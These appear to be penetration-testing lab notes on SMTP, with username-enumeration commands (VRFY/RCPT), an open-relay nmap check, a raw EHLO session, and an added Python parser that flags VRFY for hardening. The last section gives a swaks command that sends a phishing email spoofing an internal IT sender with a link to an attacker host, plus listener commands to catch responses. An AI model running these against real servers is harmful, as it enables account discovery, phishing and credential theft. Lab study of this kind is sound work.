SMTP

  • Enum users

    • VRFY asks the server whether a user exists, while RCPT TO names the recipient of a message. Both can be used for username enumeration: VRFY reports user validity directly, whereas RCPT TO confirms it indirectly, because the server accepts a valid address and rejects an invalid one.

smtp-user-enum -M VRFY -U wordlist -t 10.129.8.39 -w 20 -v -m 1

smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -D humongousretail.com -t 10.13.38.12 -m 50

# adjust timeout (-w) and workers/threads (-m)
  • Nmap - Open Relay

nmap 10.129.14.128 -p25 --script smtp-open-relay -v
  • nc / Telnet - HELO/EHLO

└──╼ [★]$ nc -nv 10.129.8.39 25
(UNKNOWN) [10.129.8.39] 25 (smtp) open
220 InFreight ESMTP v2.11
HELO mail1.inlanefreight.htb
250 mail1
EHLO mail1
250-mail1
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
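
Added example (not part of the original notes): a parser for the multiline EHLO reply captured above that checks the continuation markers and flags VRFY being advertised. The `audit` helper and the Postfix setting it mentions are assumptions; the notes do not name the MTA.

```python
import re

# One SMTP reply line: 3-digit code, then '-' (more lines follow) or ' ' (last line).
REPLY_LINE = re.compile(r"^(\d{3})([ -])(.*)$")

# EHLO reply copied from the nc session shown on this page.
EHLO_REPLY = """250-mail1
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING"""

def parse_ehlo(reply):
    """Return (greeting, {KEYWORD: [params]}) from a multiline 250 reply."""
    lines = [l for l in reply.splitlines() if l.strip()]
    if not lines:
        raise ValueError("empty reply")
    texts = []
    for i, line in enumerate(lines):
        m = REPLY_LINE.match(line)
        if not m or m.group(1) != "250":
            raise ValueError(f"EHLO not accepted or malformed: {line!r}")
        # Only the final line may use a space after the code.
        if (m.group(2) == " ") != (i == len(lines) - 1):
            raise ValueError(f"bad continuation marker: {line!r}")
        texts.append(m.group(3).split())
    caps = {t[0].upper(): t[1:] for t in texts[1:] if t}
    return " ".join(texts[0]), caps

def audit(caps):
    """Hypothetical helper: list (keyword, advice) pairs for risky settings."""
    findings = []
    if "VRFY" in caps:
        # Postfix setting named as an example; the page does not name the MTA.
        findings.append(("VRFY", "advertised; disable it, e.g. Postfix "
                         "disable_vrfy_command = yes"))
    if "STARTTLS" not in caps:
        findings.append(("STARTTLS", "not advertised; sessions stay cleartext"))
    return findings

if __name__ == "__main__":
    for keyword, advice in audit(parse_ehlo(EHLO_REPLY)[1]):
        print(f"[!] {keyword}: {advice}")
```

Turning VRFY off does not affect the RCPT TO method described under Enum users, so recipient rejections still need their own monitoring or rate limiting.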

  • Phishing emails

swaks --to sales@humongousretail.com --from it@humongousretail.com --header "Subject: Credentials / Errors" --body "citrix http://10.14.15.41/" --server humongousretail.com

# then start a listener
python3 -m http.server 80
#OR
nc -nlvp 80
